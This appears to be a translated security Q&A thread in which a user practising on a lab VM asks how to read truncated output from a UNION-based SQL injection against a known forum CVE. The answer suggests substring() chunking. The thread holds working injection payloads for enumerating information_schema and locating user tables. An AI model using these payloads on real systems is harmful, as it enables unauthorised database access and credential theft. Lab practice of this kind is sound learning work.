Iniezione SQL in spazi limitati

3

Questa potrebbe sembrare una domanda noob. Attualmente sto provando l'iniezione SQL su una VM. Questo è quello che sto provando

union select group_concat(table_name) from information_schema.tables#

E l'iniezione funziona. Ma la pagina che viene restituita è un file XML e ogni tag ha una limitazione di dimensioni, quindi posso vedere solo la metà dei risultati.

<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>

C'è un modo per stampare la seconda metà dei risultati. La tabella che ho bisogno di vedere contiene la parola "utente". Se sono troppo ambiguo voglio fare qualcosa sulla falsariga di:

  1. Disporre le righe del risultato e quindi group_concat esso
  2. Taglia il risultato (come in string[10:] )
  3. Seleziona tutte le righe dopo tables_priv

Quello che ho già provato:

union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#

Non viene stampato nulla. Ma questa query funziona quando provo direttamente nel MySQL della VM (dopo aver omesso "union" e "#").

union select group_concat(table_name) from information_schema.tables where table_name like 'user'#

Non ha funzionato né sull'applicazione Web né direttamente su MySQL di VM.

PS. So che sqlmap farà il lavoro per me, ma voglio provare le cose manualmente.

PPS. Sto cercando CVE-2011-1047 (parametro topic in feed.php)

    
posta BigFatProgrammer 12.01.2017 - 17:39
fonte

1 risposta

2

Ci devono essere routine di manipolazione delle stringhe o sth in mysql. Quindi fai semplicemente un

union select substring(group_concat(table_name),1,10) from information_schema.tables#

o qualcosa del genere e quindi esegui la query per ogni sezione ...

    
risposta data 12.01.2017 - 17:54
fonte

Leggi altre domande sui tag